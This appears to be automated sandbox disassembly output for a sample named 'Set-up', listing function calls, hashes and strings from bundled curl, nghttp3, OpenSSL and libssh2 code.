                                      Similarity
                                      • API ID: fwrite
                                      • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                                      • API String ID: 3559309478-3911685517
                                      • Opcode ID: 825ccf7392a155835207bd61eaaaa3a41b43d60caa7b30534b4cc881e3921522
                                      • Instruction ID: e4ca3d94f9face585fec2c21d0bc1b5d5eba09f327b71b0d458c0e2d97600013
                                      • Opcode Fuzzy Hash: 825ccf7392a155835207bd61eaaaa3a41b43d60caa7b30534b4cc881e3921522
                                      • Instruction Fuzzy Hash: B981E7B1A04701ABF710DA24DC45BAB7AE5BFD8714F08492CF94987292E731DD91CB92
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0058DB9C,?,005B3BB8,00000000,?,?), ref: 005B6433
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                                      • API String ID: 1222420520-1470553442
                                      • Opcode ID: b7e6a60972456399cd38db98b24086930114b283476d7692905c5d1ddabb9277
                                      • Instruction ID: 401cc29fc734f7a0d6563e293611cc857aa3cd1bdcc4123ac53af91fec7adbbd
                                      • Opcode Fuzzy Hash: b7e6a60972456399cd38db98b24086930114b283476d7692905c5d1ddabb9277
                                      • Instruction Fuzzy Hash: 5B716970604345AFDB25DF24D885BEEBBE5FF88700F448928F8499B2A1E774A940CB52
                                      APIs
                                        • Part of subcall function 00535EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00535ED4
                                        • Part of subcall function 00554F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00554F9E
                                      • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0052EA9B
                                        • Part of subcall function 005306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00535663,?), ref: 005306F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$atoistrcpy
                                      • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                                      • API String ID: 2444498485-4197959747
                                      • Opcode ID: 5d242d9d58f3895242e8b90ab10717539cad9c2137f31a19a28db0dc024acd4e
                                      • Instruction ID: cb2e218d5a4f536eca1808e0873936424d50698c6cb5c6e3adec22786c46c100
                                      • Opcode Fuzzy Hash: 5d242d9d58f3895242e8b90ab10717539cad9c2137f31a19a28db0dc024acd4e
                                      • Instruction Fuzzy Hash: CBF1F471A043156BEB109E24EC8BBA63F94BF52304F084479FD48AE2D7F771AD548762
                                      APIs
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0070A61C
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 0070A632
                                        • Part of subcall function 0070A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,0070A654,?,PRIVATE KEY), ref: 0070A0BD
                                        • Part of subcall function 0070A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0070A0C8
                                        • Part of subcall function 0070A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 0070A0DF
                                        • Part of subcall function 006838A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0068397E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strcmpstrlen
                                      • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                                      • API String ID: 3853617425-3686562516
                                      • Opcode ID: 001671b479d1cd4de2d08f7e91062f8bb906201b6a78fdf2b70f9d921f5b8fc9
                                      • Instruction ID: 72cf59c47b2dd94748aed1962130d4bbc484c21adb76a2b6a25c43a9e0ca1d86
                                      • Opcode Fuzzy Hash: 001671b479d1cd4de2d08f7e91062f8bb906201b6a78fdf2b70f9d921f5b8fc9
                                      • Instruction Fuzzy Hash: CDD12DB6E04301BBE761BA209C07F2B76D99F90744F044A2CFD48A61D3FA75E91487A7
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 005FC60E
                                      Strings
                                      • feWould block waiting for status message, xrefs: 005FC4A6
                                      • Too small FXP_STATUS, xrefs: 005FC517
                                      • Too small FXP_HANDLE, xrefs: 005FC582, 005FC675
                                      • Response too small, xrefs: 005FC4E3
                                      • Timeout waiting for status message, xrefs: 005FC4FB
                                      • Unable to allocate new SFTP handle structure, xrefs: 005FC646
                                      • Unable to send FXP_OPEN*, xrefs: 005FC45B
                                      • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 005FC410
                                      • Failed opening remote file, xrefs: 005FC531
                                      • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 005FC444
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                                      • API String ID: 3510742995-1499184223
                                      • Opcode ID: 0e227b53b39a73837d42022ddfe3e360751efb0593091f8f10e50a560f1808ce
                                      • Instruction ID: 7e473e57fbb3ad8180edfcd54c5ed5b52c0de6c3215196bf3a5709503aecfb43
                                      • Opcode Fuzzy Hash: 0e227b53b39a73837d42022ddfe3e360751efb0593091f8f10e50a560f1808ce
                                      • Instruction Fuzzy Hash: DBB114705047499BDB10CF28DC49A7BBFE4FF84318F144A2CFA5696292E778E918CB52
                                      APIs
                                      • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0055CC57), ref: 0055F028
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strrchr
                                      • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                                      • API String ID: 3418686817-2910492138
                                      • Opcode ID: 2370880545606d6b4c8d644e0b695d2967edd8aa6b4d6cba7eb58481e47f731c
                                      • Instruction ID: 7e60614fd0f69c929fc04de9d8328b37cbcf59ff95ac16a162e8fd9af11cbf9c
                                      • Opcode Fuzzy Hash: 2370880545606d6b4c8d644e0b695d2967edd8aa6b4d6cba7eb58481e47f731c
                                      • Instruction Fuzzy Hash: EAA157717043049BE7159A14DC6AB7A7FD9FB9130AF0844BAEC488B283E776ED49C790
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 005BA9E8
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,005B71B7,00000001,?,?), ref: 005BAA04
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,005B71B7,00000001,?,?), ref: 005BAA19
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,005B71B7,00000001,?,?), ref: 005BAA2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert$memcpy
                                      • String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
                                      • API String ID: 3718630003-2514804127
                                      • Opcode ID: 8a55ec87c5c32bb07fa76005e26f4442b70c3ab05344c5629fec50bd8ec9cc5e
                                      • Instruction ID: dfe4cff86cd6e14368a128f222951e0f1af3335a038e44b91c017c7651206403
                                      • Opcode Fuzzy Hash: 8a55ec87c5c32bb07fa76005e26f4442b70c3ab05344c5629fec50bd8ec9cc5e
                                      • Instruction Fuzzy Hash: 1E41AC711043059FDB00DF15CD84F9A7BE5FF59309F1A4498F4898B2A2E732E989CB52
                                      APIs
                                      • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0075238F
                                      • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 007523C4
                                      • GetLastError.KERNEL32 ref: 00752433
                                        • Part of subcall function 00752240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0074F763,?,?,?,?,?), ref: 00752251
                                        • Part of subcall function 00752240: WideCharToMultiByte.KERNEL32 ref: 00752284
                                        • Part of subcall function 00752240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 007522BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                                      • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                                      • API String ID: 3049598375-4146664032
                                      • Opcode ID: 64b70e74412fad03335ae6db329c137f6c1d48cb434b512fa47275efab074355
                                      • Instruction ID: 436bc3ca0b114ab4fb5acf9645d6ce2bad4c32029e64f21e5f0e1c3c5f63a77e
                                      • Opcode Fuzzy Hash: 64b70e74412fad03335ae6db329c137f6c1d48cb434b512fa47275efab074355
                                      • Instruction Fuzzy Hash: AF21ABA57403007BF6603665BC47F3F3959D752B06F044078FD09A51E3E5BD491A867A
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 006F49A8
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 006F4D44
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 006F4E33
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy$strcpystrlen
                                      • String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
                                      • API String ID: 699153967-1272933286
                                      • Opcode ID: e9981969a3c63a0013d3baea5dcded3671fb9427ad91a84d905ff7a465cb0f52
                                      • Instruction ID: 9c7e809165651bed15ec02cbe84664aa2a5166fd109d465b245152fe19945dd6
                                      • Opcode Fuzzy Hash: e9981969a3c63a0013d3baea5dcded3671fb9427ad91a84d905ff7a465cb0f52
                                      • Instruction Fuzzy Hash: 50C14B70B48305BBD7607A609C47F3B7AE7EF50B04F04082CFA89566D3EAB5D9149A53
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00540794
                                        • Part of subcall function 005FF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,005400B0,?,?,00000000,00000000,?), ref: 005FF35D
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0054356E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$_time64
                                      • String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
                                      • API String ID: 2413861649-3110757985
                                      • Opcode ID: cc85d1d42276cd674a05fce24e3abfb975ad211ebb2884be02031d21063bef4a
                                      • Instruction ID: 46cd2224970eae1d4d97be307a3179863a09fdf69999eb909674028da544b36b
                                      • Opcode Fuzzy Hash: cc85d1d42276cd674a05fce24e3abfb975ad211ebb2884be02031d21063bef4a
                                      • Instruction Fuzzy Hash: EDE1D3B1A047019FD715DF28C885BAABBE5FF84308F144A78F9598B352DB71AE04CB91
                                      APIs
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0057491A
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0057497C
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 005749F1
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574ABB
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574B21
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574BCF
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574C33
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574CDD
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00574D30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
